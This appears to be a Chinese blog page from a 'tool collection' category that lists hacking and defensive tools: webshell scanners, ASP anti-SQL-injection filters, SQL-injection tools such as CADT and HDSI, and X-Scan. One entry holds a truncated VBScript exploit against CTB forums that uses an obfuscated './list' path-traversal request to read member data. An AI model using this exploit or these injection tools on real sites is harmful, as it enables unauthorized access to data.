分类 ‘工具收集’ 下的日志

挂马扫马2.0版

作者:明小子 来源:http://vip.hackdiy.net/

下载地址: http://www.hackdiy.com/scanshell.exe — 4.25更新
一个多月前帮偶兄弟写~ 之前的哪个半成品非本人发布,既然被发布了!今天就抽空把扫描asp木马部分写了!

Tags:

SQL通用防注入系统3.0(asp)正式版(补充)

来源:http://www.neeao.com/

一个小小的两个文件的系统就出现了这么多的Bug,说明自己的粗心!
对发现Bug的朋友们在此说声谢谢了!
希望这个小东西能给大家的网站带来一点安全!
谢谢大家对我的支持!

发现问题请到: Neeao's Guestbook提出,谢谢你的支持!
2.0增强版 增加了自动封注入者Ip功能,使注入者不能再访问本站!
3.0版 在2.0增强版的基础上,加入了后台管理功能:
可以查看入侵者提交数据记录功能,解除对注入者ip封锁,以及删除注入记录功能!
3.0修正版 修正了封ip的一个Bug!
3.0正式版 针对用户提出的问题做了一点补充!
补充:将3.0正式版Neeao_sql_admin.asp文件中的第181行中的false修改为true解封ip即正常了!

阅读全文 »

ctb论坛利用程序vbs版

软件作者:lcx

url=inputbox("请输入ctb论坛地址,例http://www.col-e.net/ylj/ctb")
if url="" then
msgbox ("未输入地址")
wscript.quit
end if

Set oXMLHttpRequest = CreateObject("Msxml2.XMLHTTP")
oXMLHttpRequest.Open "GET", url&"/index.php?mods=member&action=info&id="&chr(46)&chr(47)&chr(108)&chr(105)&chr(115)&chr(116), False, False
oXMLHttpRequest.Send
str=oXMLHttpRequest.ResponseText
Wscript.Echo replace(MID(str,instr 阅读全文 »

Tags: ,

CADT 1.0 + 演示动画

CADT 1.0 + 演示动画 548kb 20050422cadt.zip

利用MSSQL的Openrowset实现注入点信息的读取,需要目标数据库服务器可以向外连接别的服务器。
你可以随意分发复制该软件,但是请保留版权信息。
请不要将此软件用于非法用途,触犯法律后果自负。
by:superhei modify:xiaolu
http://4ngel.net
http://666w.com

下载:http://soft.hackbase.com/41/20050422/6620.html

Tags:

X-Scan-v3.2 4.20修正版

优化主程序,升级并优化攻击脚本引擎,增加ARP查询、WHOIS查询等辅助工具;增加HTTP/TELNET/SSH/VNC/CVS/IMAP/NNTP等弱口令检测插件;修正已知BUG。

下载:http://www.xfocus.net/tools/200504/1016.html

Tags:

SQL通用防注入系统3.0(asp)版

来源:http://www.Neeao.com

SQL通用防注入系统3.0(asp)
发现问题请到: Neeao's Guestbook提出,谢谢你的支持!
2.0增强版 增加了自动封注入者Ip功能,使注入者不能再访问本站!
3.0版 在2.0增强版的基础上,加入了后台管理功能:
可以查看入侵者提交数据记录功能,解除对注入者ip封锁,以及删除注入记录功能!

文件说明:
Neeao_SqlIn.Asp 防SQl注入主文件,需要注意以下几点:

Neeao_sql_admin.asp 后台管理文件
注意:请用记事本打开Neeao_sql_admin.asp修改里面的管理密码!

使用方法很简单,,
只要在需要防注入的页面头部用
<!–#Include File="Neeao_SqlIn.Asp"–>
阅读全文 »

SQL通用防注入系统2.0(asp)Neeao增强版bate

来源:http://www.neeao.com/

程序我只做了简单测试,在使用过程中发现什么问题,请到
Neeao's GuestBook 留言!
本程序基于枫知秋的SQL通用防注入系统2.0完美版,
偶只是对代码做了一点点优化
增加了自动封注入者Ip功能,使注入者不能再访问本站!

'是否打开自动封Ip功能,True为打开,False为关闭
Kill_IP=False
'是否打开数据库记录注入功能,True为打开,False为关闭,
如果想使用自动封IP功能,此项必须打开!
WriteSql=True
使用方法很简单,,
只要在需要防注入的页面头部用
<!–#Include File="Neeao_SqlIn.Asp"–>
就可以做到页面防注入~~
阅读全文 »

HDSI 1.3版发布

来源:http://www.jiaozhu.net/

终于发布了 HDSI 1.3正式版了 PHP注射的功能也快开发完了。。
考虑把PHP注射功能完成在1.4版里。
这一版本比较稳定。准确。
大家下载吧。。

点击下载

Tags: